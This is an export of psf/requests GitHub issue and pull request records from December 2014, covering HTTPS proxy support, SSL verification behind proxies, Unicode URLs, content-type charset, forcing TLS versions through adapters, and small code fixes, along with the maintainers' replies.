2014-12-21T01:06:24Z
2021-09-08T23:06:48Z
2014-12-21T20:30:50Z
NONE
resolved
I recently tried to make a connection to a https url via a http proxy which doesn't support the 'connect' method (Crawlera http://scrapinghub.com/faq#https). I'm using the following code: import requests proxies = {"http": "http://USER:[email protected]:8010/", {"https:": "http://USER:[email protected]:8010/"} requests.get("https://wikipedia.org", proxies=proxies) will result in > Traceback (most recent call last): > File "<stdin>", line 1, in <module> > File "/usr/lib/python2.7/site-packages/requests/api.py", line 55, in get > return request('get', url, *_kwargs) > File "/usr/lib/python2.7/site-packages/requests/api.py", line 44, in request > return session.request(method=method, url=url, *_kwargs) > File "/usr/lib/python2.7/site-packages/requests/sessions.py", line 456, in request > resp = self.send(prep, *_send_kwargs) > File "/usr/lib/python2.7/site-packages/requests/sessions.py", line 559, in send > r = adapter.send(request, *_kwargs) > File "/usr/lib/python2.7/site-packages/requests/adapters.py", line 378, in send > raise ProxyError(e) Is there anything to do about that?
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2387/reactions" }
https://api.github.com/repos/psf/requests/issues/2387/timeline
null
completed
null
null
false
[ "A HTTP proxy that does not support the CONNECT verb cannot transport a HTTPS request.\n", "According to that proxy:\n\"... configure your HTTP client to use a HTTP proxy even for HTTPS URLs. However, not many clients support this for privacy reasons that don't apply to web crawling. cURL doesn't support it, but lwp-request does.\"\nIf \"this is not possible\" how does lwp-request support it?\n", "Let's be clear about what you're asking requests to do.\n\nA HTTPS request establishes a secure connection between your machine and the origin server. This means you encrypt the connection using TLS, which means you authenticate the origin server. This authentication is done using TLS certificates.\n\nCombining this with proxies is tricky. The proxy can't be the other end of the TLS connection because it doesn't have the correct certificate (nor should it!). This means all you can possibly do is establish a TCP tunnel through the proxy: you connect to the proxy, the proxy connects to the remote end, and then all packets just get forwarded through. This allows you to still perform the TLS handshake. That's exactly what the CONNECT verb is for: it establishes that TCP tunnel.\n\nTo do this _without_ the CONNECT verb requires that you make the TLS connection with the proxy instead, then use it like a standard HTTP proxy. This is a bad idea: it represents a man-in-the-middle attack. I can't stress this enough: you _need_ to ensure that you trust Crawlera before doing this.\n\nIf you _really_ want to do it, requests should be able to: set the scheme of the proxy URL you pass us to `https` rather than `http`. That will cause us to establish the TLS connection with the proxy itself. \n\nThat means your code changes to:\n\n``` python\nimport requests\nproxies = {\"http\": \"http://USER:[email protected]:8010/\",\n{\"https:\": \"https://USER:[email protected]:8010/\"}\n\nrequests.get(\"https://wikipedia.org\", proxies=proxies)\n```\n" ]
https://api.github.com/repos/psf/requests/issues/2386
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2386/labels{/name}
https://api.github.com/repos/psf/requests/issues/2386/comments
https://api.github.com/repos/psf/requests/issues/2386/events
https://github.com/psf/requests/issues/2386
52,570,106
MDU6SXNzdWU1MjU3MDEwNg==
2,386
SSL verification fails with proxy
{ "avatar_url": "https://avatars.githubusercontent.com/u/614673?v=4", "events_url": "https://api.github.com/users/peterjeschke/events{/privacy}", "followers_url": "https://api.github.com/users/peterjeschke/followers", "following_url": "https://api.github.com/users/peterjeschke/following{/other_user}", "gists_url": "https://api.github.com/users/peterjeschke/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/peterjeschke", "id": 614673, "login": "peterjeschke", "node_id": "MDQ6VXNlcjYxNDY3Mw==", "organizations_url": "https://api.github.com/users/peterjeschke/orgs", "received_events_url": "https://api.github.com/users/peterjeschke/received_events", "repos_url": "https://api.github.com/users/peterjeschke/repos", "site_admin": false, "starred_url": "https://api.github.com/users/peterjeschke/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/peterjeschke/subscriptions", "type": "User", "url": "https://api.github.com/users/peterjeschke", "user_view_type": "public" }
[ { "color": "e11d21", "default": false, "description": null, "id": 136589914, "name": "Needs Info", "node_id": "MDU6TGFiZWwxMzY1ODk5MTQ=", "url": "https://api.github.com/repos/psf/requests/labels/Needs%20Info" } ]
closed
true
null
[]
null
11
2014-12-20T17:14:49Z
2021-09-08T22:00:53Z
2015-08-31T09:43:00Z
NONE
resolved
Using this code: ``` import requests requests.get('https://github.com') ``` Throws the following exception: ``` Traceback (most recent call last): File "<stdin>", line 1, in <module> File "/usr/lib/python2.7/site-packages/requests/api.py", line 55, in get return request('get', url, **kwargs) File "/usr/lib/python2.7/site-packages/requests/api.py", line 44, in request return session.request(method=method, url=url, **kwargs) File "/usr/lib/python2.7/site-packages/requests/sessions.py", line 456, in request resp = self.send(prep, **send_kwargs) File "/usr/lib/python2.7/site-packages/requests/sessions.py", line 559, in send r = adapter.send(request, **kwargs) File "/usr/lib/python2.7/site-packages/requests/adapters.py", line 382, in send raise SSLError(e, request=request) requests.exceptions.SSLError: hostname '<Proxy>' doesn't match either of 'github.com', 'www.github.com' ``` where <Proxy> is the URL of the http(s)-proxy I'm using. I have set the environment-variables HTTP_PROXY and HTTPS_PROXY (lowercase, too) to that URL. Is it possible to avoid that error without appending verify=False so I don't have to mess with other projects?
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2386/reactions" }
https://api.github.com/repos/psf/requests/issues/2386/timeline
null
completed
null
null
false
[ "Does the URL to your proxy begin with `https://`? That will cause us to try a TLS handshake with that proxy, which obviously fails as that proxy isn't authoritative for that domain. If this is the case, try setting the protocol to `http://`.\n", "It does start with https://, but setting it to http:// doesn't help.\n", "@looperhacks can you tell us what kind of proxy this is? Also, I doubt it will help, but have you attempted to use the `proxies` argument to `get`?\n", "I don't know the software used, but using a squid-proxy causes the same problem. `proxies` doesn't help either.\n", "When you say switching to `http://` doesn't help, do you mean you're getting the exact same error?\n", "Yes. \n", "`curl` doesn't seem to accept `http_proxy=https://...`. I can't make Chrome use an HTTPS proxy either. Is this something people use?\n", "It is extremely uncommon, but it does exist and we do technically support it.\n", "Duplicate: https://github.com/shazow/urllib3/issues/531\n\nBTW, there is no support for HTTPS proxies in requests/urllib3, see https://github.com/kennethreitz/requests/issues/1622\n", "Ah, thanks for the reminder @schlamar, I had forgotten that we regressed/removed this.\n", "Not quite, the current behavior is that HTTPS via HTTPS proxy silently degrades to HTTPS via HTTP proxy... ;)\n" ]
https://api.github.com/repos/psf/requests/issues/2385
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2385/labels{/name}
https://api.github.com/repos/psf/requests/issues/2385/comments
https://api.github.com/repos/psf/requests/issues/2385/events
https://github.com/psf/requests/issues/2385
52,506,296
MDU6SXNzdWU1MjUwNjI5Ng==
2,385
POST to url with unicode character
{ "avatar_url": "https://avatars.githubusercontent.com/u/1793789?v=4", "events_url": "https://api.github.com/users/burdiyan/events{/privacy}", "followers_url": "https://api.github.com/users/burdiyan/followers", "following_url": "https://api.github.com/users/burdiyan/following{/other_user}", "gists_url": "https://api.github.com/users/burdiyan/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/burdiyan", "id": 1793789, "login": "burdiyan", "node_id": "MDQ6VXNlcjE3OTM3ODk=", "organizations_url": "https://api.github.com/users/burdiyan/orgs", "received_events_url": "https://api.github.com/users/burdiyan/received_events", "repos_url": "https://api.github.com/users/burdiyan/repos", "site_admin": false, "starred_url": "https://api.github.com/users/burdiyan/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/burdiyan/subscriptions", "type": "User", "url": "https://api.github.com/users/burdiyan", "user_view_type": "public" }
[]
closed
true
null
[]
null
3
2014-12-19T17:14:07Z
2021-09-08T23:06:49Z
2014-12-21T15:41:52Z
NONE
resolved
Hello, I have this code for making POST request to url with unicode character. I tried to replace `í` to `%C3%AD` but python is still telling me: `UnicodeEncodeError: 'ascii' codec can't encode character '\xf3' in position 1771: ordinal not in range(128)` ``` # coding=UTF-8 import requests url = u'http://www.madridmovilidad.es/localizador-vehículo.aspx?idioma=es' payload = {'veh_matricula': '5555HWS'} url = url.encode('UTF-8') r = requests.post(url, data=payload) print(r.text) ``` I'm new to Python, but I have tried all I could find to solve python unicode "problems" but nothing helps. So maybe this is requests problem? Can anyone help me, please? Thank you!
{ "avatar_url": "https://avatars.githubusercontent.com/u/1793789?v=4", "events_url": "https://api.github.com/users/burdiyan/events{/privacy}", "followers_url": "https://api.github.com/users/burdiyan/followers", "following_url": "https://api.github.com/users/burdiyan/following{/other_user}", "gists_url": "https://api.github.com/users/burdiyan/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/burdiyan", "id": 1793789, "login": "burdiyan", "node_id": "MDQ6VXNlcjE3OTM3ODk=", "organizations_url": "https://api.github.com/users/burdiyan/orgs", "received_events_url": "https://api.github.com/users/burdiyan/received_events", "repos_url": "https://api.github.com/users/burdiyan/repos", "site_admin": false, "starred_url": "https://api.github.com/users/burdiyan/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/burdiyan/subscriptions", "type": "User", "url": "https://api.github.com/users/burdiyan", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2385/reactions" }
https://api.github.com/repos/psf/requests/issues/2385/timeline
null
completed
null
null
false
[ "I did the following on python 2.7 and 3.4 and had no problems\n\n``` python\nurl = u'http://www.madridmovilidad.es/localizador-vehículo.aspx?idioma=es'\npayload = {'veh_matricula': '5555HWS'}\nrequests.get(url)\nrequests.post(url, data=payload)\n```\n\nCould you provide the entire stacktrace? I suspect this is actually coming from your calling `print(r.text)`.\n", "@sigmavirus24 You are right. That was because of `print(r.text)` call. Thank you!\n", "@burdiyan the next time you have _questions_ and need help, please use our official Q&A section on [StackOverflow](https://stackoverflow.com/questions/tagged/python-requests). You'll get an answer much faster.\n" ]
https://api.github.com/repos/psf/requests/issues/2384
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2384/labels{/name}
https://api.github.com/repos/psf/requests/issues/2384/comments
https://api.github.com/repos/psf/requests/issues/2384/events
https://github.com/psf/requests/pull/2384
52,464,722
MDExOlB1bGxSZXF1ZXN0MjYzNjA1Nzk=
2,384
set charset in content type if UTF-8 data was encoded
{ "avatar_url": "https://avatars.githubusercontent.com/u/3083638?v=4", "events_url": "https://api.github.com/users/bm371613/events{/privacy}", "followers_url": "https://api.github.com/users/bm371613/followers", "following_url": "https://api.github.com/users/bm371613/following{/other_user}", "gists_url": "https://api.github.com/users/bm371613/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/bm371613", "id": 3083638, "login": "bm371613", "node_id": "MDQ6VXNlcjMwODM2Mzg=", "organizations_url": "https://api.github.com/users/bm371613/orgs", "received_events_url": "https://api.github.com/users/bm371613/received_events", "repos_url": "https://api.github.com/users/bm371613/repos", "site_admin": false, "starred_url": "https://api.github.com/users/bm371613/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/bm371613/subscriptions", "type": "User", "url": "https://api.github.com/users/bm371613", "user_view_type": "public" }
[]
closed
true
null
[]
null
2
2014-12-19T09:47:50Z
2021-09-08T09:01:07Z
2014-12-19T10:26:32Z
NONE
resolved
Content type `'application/x-www-form-urlencoded'`, that is automatically provided by requests sometimes, should actually be `'application/x-www-form-urlencoded; charset=UTF-8'` if provided data is UTF-8.
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2384/reactions" }
https://api.github.com/repos/psf/requests/issues/2384/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2384.diff", "html_url": "https://github.com/psf/requests/pull/2384", "merged_at": null, "patch_url": "https://github.com/psf/requests/pull/2384.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2384" }
true
[ "This is incorrect behaviour, I'm afraid.\n\nThe `charset` parameter is only defined for documents of type `text/*`. That does not apply to `application/x-www-form-urlencoded`. Therefore, sending `charset` would be a specification violation.\n\nOur behaviour is consistent with the W3C HTML5 specification, which says the following:\n\n> If the form element has an accept-charset attribute, let the selected character encoding be the result of picking an encoding for the form.\n> \n> Otherwise, if the form element has no accept-charset attribute, but the document's character encoding is an ASCII-compatible character encoding, then that is the selected character encoding.\n> \n> Otherwise, let the selected character encoding be UTF-8.\n\nWe can't do either of the first two things because we don't know what the document or form looks like, so we can only do the third. If the user wants a different behaviour (per the first two points) they are required to do it themselves.\n\nI'm sorry we can't accept this, but this is one of those things that seems like it should be simple but is actually quite complex.\n", "OK, lesson learnt.\n" ]
https://api.github.com/repos/psf/requests/issues/2383
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2383/labels{/name}
https://api.github.com/repos/psf/requests/issues/2383/comments
https://api.github.com/repos/psf/requests/issues/2383/events
https://github.com/psf/requests/issues/2383
52,218,518
MDU6SXNzdWU1MjIxODUxOA==
2,383
Force use of tls with requests
{ "avatar_url": "https://avatars.githubusercontent.com/u/10159045?v=4", "events_url": "https://api.github.com/users/tesande/events{/privacy}", "followers_url": "https://api.github.com/users/tesande/followers", "following_url": "https://api.github.com/users/tesande/following{/other_user}", "gists_url": "https://api.github.com/users/tesande/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/tesande", "id": 10159045, "login": "tesande", "node_id": "MDQ6VXNlcjEwMTU5MDQ1", "organizations_url": "https://api.github.com/users/tesande/orgs", "received_events_url": "https://api.github.com/users/tesande/received_events", "repos_url": "https://api.github.com/users/tesande/repos", "site_admin": false, "starred_url": "https://api.github.com/users/tesande/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/tesande/subscriptions", "type": "User", "url": "https://api.github.com/users/tesande", "user_view_type": "public" }
[]
closed
true
null
[]
null
8
2014-12-17T09:34:16Z
2021-09-08T23:06:49Z
2014-12-18T23:19:41Z
NONE
resolved
Hi ! I have used requests successfully for calling some rest resources. I have called these resources in our staging environment, and things has worked well. Now I've tried to call the resources in our test environment, but receives the error SSL3_GET_RECORD:decryption failed or bad record mac. I recon there is a problem with the ssl connection, and want to try forcing requests to use TLS v1. How can I achieve this? I have tried creating the class ForceTLSV1Adapter which is described here http://stackoverflow.com/questions/26733462/ssl-and-tls-in-python-requests, but I don't know how to tell requests to use this class. Could you please give me a hint? Thanks in advance Tor Erik
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2383/reactions" }
https://api.github.com/repos/psf/requests/issues/2383/timeline
null
completed
null
null
false
[ "By the way, I've seen the advanced usage documentation (http://docs.python-requests.org/en/latest/user/advanced/), and tried to modify the Ssl3HttpAdapter to be a TLS Adapter. \nI use s = requests.Session() s.mount to mount the adapter. In the mount command, I have both tried the rest resource url and the root url (https://mydomain.com)\n", "It's possible that the SSL version you need to try isn't TLSv1. Try SSLv3, for example.\n\n> On 17 Dec 2014, at 10:01, tesande [email protected] wrote:\n> \n> By the way, I've seen the advanced usage documentation (http://docs.python-requests.org/en/latest/user/advanced/), and tried to modify the Ssl3HttpAdapter to be a TLS Adapter. \n> I use s = requests.Session() s.mount to mount the adapter. In the mount command, I have both tried the rest resource url and the root url (https://mydomain.com)\n> \n> —\n> Reply to this email directly or view it on GitHub.\n", "I have tried that as well. Same error message. To me it seems the adapter isn't used, since the error message indicates SSL3. \nHow is it supposed to be plugged in? Am I correct about the request.Session() and mount() Should I mount all the addresses, or only the domain url?\n", "The adapter is definitely being used if correctly plugged in. When you call `mount`, you pass two arguments: the first is a prefix to match, the second is an instance of your adapter. So long as your prefix matches your URL this should work fine: if it continues to fail, the problem is not that.\n\nAgain, try all the TLS constants available to you, all the way up to PROTOCOL_TLSv1_2 if your OpenSSL supports it. If that continues not to work, the problem is not the protocol we're using to do the negotiation.\n", "I ran my two servers through ssllabs. One big difference is: \nThere is no support for secure renegotiation. \n\nI guess this could be a reason. Is it a workaround, or do I have to make the ops guys update the server?\n", "I have tried the following: Changed protocol for communication with one of the working servers to SSL2. Although my server doesn't support SSL 2 (Stated by ssllabs), the communication still works. I think that's weird. \n\nHere is my mounting code: \nurltorun = environment + \"/\" + url\ns=requests.Session()\ns.mount(urltorun,Ssl3HttpAdapter() )#Has changed the class implementation but not the class name\nsmoketeststorun = requests.get(urltorun)\n\nAdapter: \nclass Ssl3HttpAdapter(HTTPAdapter):\n\n```\ndef init_poolmanager(self, connections, maxsize, block=False):\n print 'Yjoooooooooooooooooooooooooooninh'\n self.poolmanager = PoolManager(num_pools=connections,\n maxsize=maxsize,\n block=block,\n ssl_version=ssl.PROTOCOL_TLSv1)\n```\n", "That code appears to negotiate TLSv1, not SSLv2.\n", "This is clearly _not_ a bug in requests. Further work on this _question_ should take place on the forum for questions about requests, [StackOverflow](https://stackoverflow.com/questions/tagged/python-requests).\n" ]
https://api.github.com/repos/psf/requests/issues/2382
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2382/labels{/name}
https://api.github.com/repos/psf/requests/issues/2382/comments
https://api.github.com/repos/psf/requests/issues/2382/events
https://github.com/psf/requests/pull/2382
52,083,753
MDExOlB1bGxSZXF1ZXN0MjYxMjg3MzQ=
2,382
catch exception more specifically
{ "avatar_url": "https://avatars.githubusercontent.com/u/3482660?v=4", "events_url": "https://api.github.com/users/daftshady/events{/privacy}", "followers_url": "https://api.github.com/users/daftshady/followers", "following_url": "https://api.github.com/users/daftshady/following{/other_user}", "gists_url": "https://api.github.com/users/daftshady/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/daftshady", "id": 3482660, "login": "daftshady", "node_id": "MDQ6VXNlcjM0ODI2NjA=", "organizations_url": "https://api.github.com/users/daftshady/orgs", "received_events_url": "https://api.github.com/users/daftshady/received_events", "repos_url": "https://api.github.com/users/daftshady/repos", "site_admin": false, "starred_url": "https://api.github.com/users/daftshady/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/daftshady/subscriptions", "type": "User", "url": "https://api.github.com/users/daftshady", "user_view_type": "public" }
[]
closed
true
null
[]
null
1
2014-12-16T08:04:53Z
2021-09-08T09:01:08Z
2014-12-16T09:19:50Z
CONTRIBUTOR
resolved
Because `raise_for_status` only raises `HTTPError`, I think it's better to catch `HTTPError` which is a subclass of `RequestException`. Please review this.
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2382/reactions" }
https://api.github.com/repos/psf/requests/issues/2382/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2382.diff", "html_url": "https://github.com/psf/requests/pull/2382", "merged_at": "2014-12-16T09:19:50Z", "patch_url": "https://github.com/psf/requests/pull/2382.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2382" }
true
[ "Agreed! Thanks for this! :cake:\n" ]
https://api.github.com/repos/psf/requests/issues/2381
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2381/labels{/name}
https://api.github.com/repos/psf/requests/issues/2381/comments
https://api.github.com/repos/psf/requests/issues/2381/events
https://github.com/psf/requests/pull/2381
51,953,876
MDExOlB1bGxSZXF1ZXN0MjYwNDk4MzI=
2,381
Fix a typo in a comment
{ "avatar_url": "https://avatars.githubusercontent.com/u/5542943?v=4", "events_url": "https://api.github.com/users/namlede/events{/privacy}", "followers_url": "https://api.github.com/users/namlede/followers", "following_url": "https://api.github.com/users/namlede/following{/other_user}", "gists_url": "https://api.github.com/users/namlede/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/namlede", "id": 5542943, "login": "namlede", "node_id": "MDQ6VXNlcjU1NDI5NDM=", "organizations_url": "https://api.github.com/users/namlede/orgs", "received_events_url": "https://api.github.com/users/namlede/received_events", "repos_url": "https://api.github.com/users/namlede/repos", "site_admin": false, "starred_url": "https://api.github.com/users/namlede/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/namlede/subscriptions", "type": "User", "url": "https://api.github.com/users/namlede", "user_view_type": "public" }
[]
closed
true
null
[]
null
4
2014-12-15T06:37:31Z
2021-09-08T09:01:08Z
2014-12-15T07:59:47Z
CONTRIBUTOR
resolved
I just fixed a minor typo: "throws" is misspelled as "thows".
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2381/reactions" }
https://api.github.com/repos/psf/requests/issues/2381/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2381.diff", "html_url": "https://github.com/psf/requests/pull/2381", "merged_at": "2014-12-15T07:59:47Z", "patch_url": "https://github.com/psf/requests/pull/2381.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2381" }
true
[ "Thanks for this! :cake:\n", "I would make a joke about how omitting random letters is cool, but it wouldn't be funy. \n\nThanks @namlede \n", "Your wecome.\n", ":+1: \n" ]
https://api.github.com/repos/psf/requests/issues/2380
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2380/labels{/name}
https://api.github.com/repos/psf/requests/issues/2380/comments
https://api.github.com/repos/psf/requests/issues/2380/events
https://github.com/psf/requests/pull/2380
51,925,675
MDExOlB1bGxSZXF1ZXN0MjYwMzY3Nzk=
2,380
Added a save method to Response objects
{ "avatar_url": "https://avatars.githubusercontent.com/u/6031925?v=4", "events_url": "https://api.github.com/users/syndbg/events{/privacy}", "followers_url": "https://api.github.com/users/syndbg/followers", "following_url": "https://api.github.com/users/syndbg/following{/other_user}", "gists_url": "https://api.github.com/users/syndbg/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/syndbg", "id": 6031925, "login": "syndbg", "node_id": "MDQ6VXNlcjYwMzE5MjU=", "organizations_url": "https://api.github.com/users/syndbg/orgs", "received_events_url": "https://api.github.com/users/syndbg/received_events", "repos_url": "https://api.github.com/users/syndbg/repos", "site_admin": false, "starred_url": "https://api.github.com/users/syndbg/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/syndbg/subscriptions", "type": "User", "url": "https://api.github.com/users/syndbg", "user_view_type": "public" }
[]
closed
true
null
[]
null
4
2014-12-14T17:46:51Z
2021-09-08T09:01:09Z
2014-12-14T17:55:50Z
NONE
resolved
Added an easy way to save content on the File System. Should I write a test for this? I didn't find a test for `iter_content` so that's why I skipped testing `save`.
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2380/reactions" }
https://api.github.com/repos/psf/requests/issues/2380/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2380.diff", "html_url": "https://github.com/psf/requests/pull/2380", "merged_at": null, "patch_url": "https://github.com/psf/requests/pull/2380.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2380" }
true
[ "Thanks for this @syndbg! Unfortunately, we're in feature freeze, so we won't be accepting this patch. Sorry, and thanks for the work!\n", "No problems, @Lukasa !\n\nCan I help you somehow? I'm assuming a feature freeze is applied to fix bugs. \n", "If you see any open bugs you'd like to work on, feel free, we are happy to merge those. =)\n", "And in the interest of full disclosure a lot of bugs that are categorized are probably waiting for us to start developing 3.0 (which is not a feature release but something we're doing to break some existing features in a backwards incompatible way). Other bugs may not be entirely decided upon so resurrecting discussions would be a good idea. Please do this to make sure you're working on a bug and not just something we forgot to close.\n" ]
https://api.github.com/repos/psf/requests/issues/2379
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2379/labels{/name}
